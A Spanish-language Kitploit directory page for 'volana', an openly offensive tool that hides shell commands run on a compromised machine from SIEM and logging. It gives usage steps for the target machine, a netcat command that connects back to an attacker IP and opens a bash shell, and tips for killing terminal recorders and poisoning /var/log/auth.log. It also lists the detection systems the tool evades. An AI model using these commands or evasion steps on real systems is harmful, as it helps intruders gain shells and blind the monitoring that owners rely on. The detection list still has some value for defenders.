Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
volana — 🌒 Ofuscación de comandos de shell para evitar sistemas de detección | Kitploit
Herramientas/GitHubGitHub/ariary/volana
ExplotaciónEvasión de IDS/IPSShellcodePruebas de PenetraciónComando y ControlRed Teaming
GitHubariary/volana

volana

🌒 Ofuscación de comandos de shell para evitar sistemas de detección

Ver Repositorio
1209hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

volana (luna en malgache)

root@kitploit:~
{ Úsalo ; 🌚(ocultar de); 🌞(detectado por) } 

Ofuscación de comandos de shell para evitar SIEM/sistema de detección

Durante un pentest, un aspecto importante es ser sigiloso. Por esta razón debes borrar tus huellas después de tu paso. Sin embargo, muchas infraestructuras registran comandos y los envían a un SIEM en tiempo real, lo que hace que la limpieza posterior por sí sola sea inútil.

volana proporciona una forma sencilla de ocultar comandos ejecutados en una máquina comprometida, proporcionando su propio runtime de shell (ingresa tu comando, volana lo ejecuta por ti). De esta manera borras tus huellas DURANTE tu paso

Uso

Necesitas obtener un shell interactivo. (Encuentra una forma de generarlo, eres un hacker, ¡es tu trabajo! de lo contrario). Luego descárgalo en la máquina objetivo y ejecútalo. Eso es todo, ahora puedes escribir el comando que desees ejecutar de forma sigilosa.

root@kitploit:~
## Descárgalo desde el release de GitHub
## Si no tienes acceso a internet desde la máquina comprometida, busca otra forma
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana

## Ejecútalo
./volana

## Ahora estás bajo el radar
volana » echo "¡Hola equipo SIEM! ¿Me encuentran?" > /dev/null 2>&1  #te puedes permitir un poco de chulería
volana » [comando]

Palabras clave para la consola de volana:

  • ring: activa el modo anillo, es decir, cada comando se lanza junto con muchos otros para cubrir rastros (de soluciones que monitorean llamadas al sistema)
  • exit: salir de la consola volana

desde shell no interactivo

Imagina que tienes un shell no interactivo (webshell o rce ciega); podrías usar los subcomandos encrypt y decrypt. Previamente, necesitas construir volana con una clave de cifrado incrustada.

En la máquina del atacante

root@kitploit:~
## Construir volana con clave de cifrado
make build.volana-with-encryption

## Transferirlo al OBJETIVO (el único comando detectable)
## [...]

## Cifrar el comando que deseas ejecutar sigilosamente
## (Aquí un bindshell de nc para obtener un shell interactivo)
volana encr "nc [ip_atacante] [puerto_atacante] -e /bin/bash"
>>> COMANDO CIFRADO

Copia el comando cifrado y ejecútalo con tu rce en la máquina objetivo

root@kitploit:~
./volana decr [comando_cifrado]
## Ahora tienes un bindshell, conviértelo en interactivo y usa volana normalmente para ser sigiloso (./volana). + No olvides eliminar el binario de volana antes de irte (porque la clave de descifrado se puede obtener fácilmente de él)

¿Por qué no simplemente ocultar el comando con echo [comando] | base64 ? Y decodificar en el objetivo con echo [comando_cifrado] | base64 -d | bash

Porque queremos estar protegidos contra sistemas que activan alertas por el uso de base64 o que buscan texto en base64 en los comandos. Además, queremos dificultar la investigación y base64 no es un freno real.

Detección

Ten en cuenta que volana no es un milagro que te hará totalmente invisible. Su objetivo es hacer más difícil la detección de intrusiones y la investigación.

Por "detectado" nos referimos a si somos capaces de activar una alerta si se ha ejecutado un comando determinado.

Ocultar de

Solo la línea de comando de lanzamiento de volana será capturada. 🧠 Sin embargo, al agregar un espacio antes de ejecutarlo, el comportamiento predeterminado de bash es no guardarlo.

  • Sistemas de detección basados en la salida del comando history
  • Sistemas de detección basados en archivos de historial
    • .bash_history, ".zsh_history", etc.
  • Sistemas de detección basados en trampas de depuración de bash
  • Sistemas de detección basados en el sistema de registro integrado de sudo
  • Sistemas de detección que rastrean todas las llamadas al sistema de procesos a nivel de sistema (ej. opensnoop)
  • Grabadores de terminal (tty) (script, screen -L, sexonthebash, ovh-ttyrec, etc.)
    • Fácil de detectar y evitar: pkill -9 script
    • No es un caso común
    • screen es un poco más difícil de evitar, sin embargo no registra la entrada (entrada secreta: stty -echo => evita)
    • La detección de comandos se podría evitar con volana mediante cifrado

Visible para

  • Sistemas de detección que tienen alertas para comandos desconocidos (el de volana)
  • Sistemas de detección basados en keyloggers
    • Fácil de evitar: copiar/pegar comandos
    • No es un caso común
  • Sistemas de detección basados en archivos syslog (ej. /var/log/auth.log)
    • Solo para comandos sudo o su
    • El archivo syslog podría ser modificado y por lo tanto envenenado como desees (ej. para /var/log/auth.log: logger -p auth.info "Ningún hacker está envenenando tu solución syslog, no te preocupes")
  • Sistemas de detección basados en llamadas al sistema (ej. auditd, LKML/eBPF)
    • Difícil de analizar, se podría volver ilegible realizando varias llamadas de desvío
  • Inyección personalizada de LD_PRELOAD para generar registros
    • No es un caso común en absoluto

Bug bounty

Lo siento por el título clickbait, pero no se proporcionará dinero a los contribuyentes. 🐛

Házmelo saber si has encontrado:

  • una forma de detectar volana
  • una forma de espiar la consola que no detecte los comandos de volana
  • una forma de evitar un sistema de detección

Reporta aquí

Créditos

  • 8 formas de espiar la consola
  • moonwalk: herramienta similar que borra huellas DESPUÉS del paso
Descargar herramienta